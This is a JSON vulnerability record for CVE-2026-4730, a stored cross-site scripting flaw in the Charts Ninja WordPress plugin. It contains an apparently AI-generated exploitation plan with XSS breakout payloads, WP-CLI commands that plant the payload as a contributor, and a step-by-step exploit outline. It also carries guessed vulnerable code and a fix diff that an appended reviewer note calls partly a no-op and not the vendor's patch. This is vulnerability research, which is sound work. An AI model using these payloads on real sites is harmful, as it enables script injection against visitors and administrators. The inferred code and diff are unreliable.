[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fS4vLbJwTxo50EmkRUeDq9Vn3BaFsyxfozHAH5EqAjLU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4730","charts-ninja-create-beautiful-graphs-charts-and-easily-add-them-to-your-website-authenticated-contributor-stored-cross-s","Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website \u003C= 2.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'chartid' Shortcode Attribute","The Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","charts-ninja-graphs-and-charts",null,"\u003C=2.1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:07:54","2026-05-05 02:26:54",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F491c7680-d270-41ed-a756-9397a0bd86bc?source=api-prod",[],"researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the **Charts Ninja** plugin (CVE-2026-4730). Since source files were not provided in the prompt, this plan is based on the vulnerability description and standard WordPress plugin patterns for shortcode processing.\n\n### 1. Vulnerability Summary\nThe \"Charts Ninja\" plugin fails to sanitize or escape the `chartid` attribute within its shortcode handler. When a user with Contributor-level permissions or higher embeds the shortcode in a post or page, the `chartid` value is reflected directly into the page output. Because this output occurs on the frontend for all visitors (including administrators), it allows for Stored XSS.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post Editor (Gutenberg or Classic) or the `wp-json\u002Fwp\u002Fv2\u002Fposts` REST API endpoint.\n*   **Shortcode Name:** `[charts-ninja-visual]` (inferred based on plugin functionality).\n*   **Vulnerable Parameter:** The `chartid` attribute within the shortcode.\n*   **Authentication Level:** Contributor or higher. 
Contributors can create posts and use shortcodes but cannot publish them; however, they can \"Preview\" the post, which is sufficient to trigger the XSS on themselves or an editor reviewing the post.\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers a shortcode, likely in the main plugin file or an initialization class:\n    `add_shortcode( 'charts-ninja-visual', 'render_charts_ninja_shortcode' );`\n2.  **Attributes Parsing:** The handler function uses `shortcode_atts()` to extract parameters:\n    ```php\n    function render_charts_ninja_shortcode( $atts ) {\n        $a = shortcode_atts( array(\n            'chartid' => '',\n            \u002F\u002F ... other attributes\n        ), $atts );\n        $chart_id = $a['chartid']; \u002F\u002F Input is captured here\n    ```\n3.  **Vulnerable Sink:** The `$chart_id` is then concatenated into HTML output without using `esc_attr()`, `esc_html()`, or `wp_kses()`:\n    ```php\n    \u002F\u002F Example of a likely vulnerable sink\n    return '\u003Cdiv class=\"charts-ninja-container\" data-chartid=\"' . $chart_id . '\">\u003C\u002Fdiv>';\n    ```\n    OR\n    ```php\n    return '\u003Cscript>var cn_id = \"' . $chart_id . '\";\u003C\u002Fscript>';\n    ```\n\n### 4. Nonce Acquisition Strategy\nShortcodes themselves do not require nonces for execution. The vulnerability is exploited by **saving** a post containing the shortcode.\n*   **Saving via REST API:** Requires a `_wpnonce` usually located in the `wpApiSettings` object on admin pages.\n*   **Saving via Heartbeat\u002FAutosave:** Uses specific nonces.\n*   **Primary Strategy:** Use WP-CLI to create the post as a Contributor. This bypasses the need for manual nonce handling during the \"injection\" phase, focusing the proof-of-concept on the **rendering** phase.\n\n### 5. 
Exploitation Strategy\nThe goal is to inject an XSS payload into the `chartid` attribute that breaks out of its HTML context.\n\n**Step 1: Identify the breakout.**\nIf the output is: `\u003Cdiv id=\"cn-[chartid]\">`, the payload is `1\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n\n**Step 2: Create the malicious content.**\nWe will create a post containing the shortcode with the payload.\n\n**Step 3: Execute the HTTP Request.**\nUse the `http_request` tool to view the post and verify the payload is rendered unescaped.\n\n**Payloads to test:**\n1.  Attribute breakout: `chartid='\">\u003Cscript>alert(1)\u003C\u002Fscript>'`\n2.  JavaScript context: `chartid='\";alert(2)\u002F\u002F'`\n3.  Event handler: `chartid='x\" onmouseover=\"alert(3)'`\n\n### 6. Test Data Setup\n1.  **Plugin Activation:** Ensure `charts-ninja-graphs-and-charts` is installed and active.\n2.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n3.  **Post Creation (The Injection):**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_author=$(wp user get attacker --field=ID) --post_title=\"XSS Test\" --post_content='[charts-ninja-visual chartid=\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]'\n    ```\n\n### 7. Expected Results\n*   The HTTP response for the page containing the post will include the raw, unescaped string: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n*   The browser (if rendered) would execute the script.\n*   The `Content-Type` of the response will be `text\u002Fhtml`.\n\n### 8. Verification Steps\n1.  
**Verify via HTTP:**\n    Fetch the URL of the newly created post:\n    ```javascript\n    \u002F\u002F Using the automated agent's tool\n    const response = await http_request({\n        url: 'http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]',\n        method: 'GET'\n    });\n    const leaked = response.body.includes('\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>');\n    console.log(\"XSS Verified: \" + leaked);\n    ```\n2.  **Verify via WP-CLI (Database check):**\n    Ensure the payload is stored exactly as sent:\n    ```bash\n    wp post get [POST_ID] --field=post_content\n    ```\n\n### 9. Alternative Approaches\nIf the `chartid` is used inside a JavaScript block (DOM-based or reflected in JS), the payload will change:\n*   **JS Variable breakout:** `chartid='-alert(document.domain)-'`\n*   **Iframe source injection:** If `chartid` builds a URL, try `javascript:alert(1)`.\n\nIf the shortcode name `[charts-ninja-visual]` is incorrect:\n1.  Run `grep -r \"add_shortcode\" wp-content\u002Fplugins\u002Fcharts-ninja-graphs-and-charts\u002F` to find the correct shortcode tag.\n2.  Identify the function name and look for where `$atts['chartid']` is used.","The Charts Ninja plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' attribute in its shortcode handler. Due to a lack of input sanitization and output escaping, an authenticated attacker with Contributor-level permissions or higher can inject arbitrary scripts into posts that execute when viewed by other users.","\u002F\u002F Inferred code structure based on plugin functionality and vulnerability report\nfunction render_charts_ninja_shortcode( $atts ) {\n    $a = shortcode_atts( array(\n        'chartid' => '',\n    ), $atts );\n\n    $chart_id = $a['chartid'];\n\n    \u002F\u002F Vulnerable output: chartid is concatenated directly into the HTML\n    return '\u003Cdiv class=\"charts-ninja-visual\" data-chartid=\"' . $chart_id . 
'\">\u003C\u002Fdiv>';\n}\nadd_shortcode( 'charts-ninja-visual', 'render_charts_ninja_shortcode' );","--- a\u002Fcharts-ninja.php\n+++ b\u002Fcharts-ninja.php\n@@ -10,7 +10,7 @@\n         'chartid' => '',\n     ), $atts );\n \n-    $chart_id = $a['chartid'];\n+    $chart_id = esc_attr( $a['chartid'] );\n \n-    return '\u003Cdiv class=\"charts-ninja-visual\" data-chartid=\"' . $chart_id . '\">\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"charts-ninja-visual\" data-chartid=\"' . $chart_id . '\">\u003C\u002Fdiv>';","1. Authenticate as a Contributor or higher user.\n2. Access the post editor (Gutenberg or Classic) to create a new post or edit an existing one.\n3. Insert the plugin's shortcode with a malicious payload in the 'chartid' attribute: [charts-ninja-visual chartid='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'].\n4. Save the post as a draft or publish it (if permissions allow).\n5. Navigate to the frontend URL of the post or use the 'Preview' feature.\n6. The browser will execute the injected script because the 'chartid' value breaks out of the HTML attribute context and renders a raw \u003Cscript> tag.","gemini-3-flash-preview","2026-05-04 16:49:49","2026-05-04 16:50:07",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcharts-ninja-graphs-and-charts\u002Ftags"]
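Review bot: the second `-`/`+` pair in the `research_fix_diff` hunk is byte-for-byte identical (`return '<div class="charts-ninja-visual" data-chartid="' . $chart_id . '"></div>';` on both sides), so it records no change and should be dropped from the diff; the only real change is `$chart_id = esc_attr( $a['chartid'] );`. Escaping with `esc_attr()` matches the double-quoted attribute sink shown, but escaping at the assignment rather than at the output site is fragile: if `$chart_id` is also used for a lookup or emitted into a JavaScript context elsewhere in the handler, a single early `esc_attr()` is not the right encoding for those contexts, so escape at each output site instead. Also note this diff is model-inferred (`patch_diff_files` is empty and `patched_in_version` is null), not the plugin's published patch, so it should not be read as confirmation of how the vendor fixed the issue.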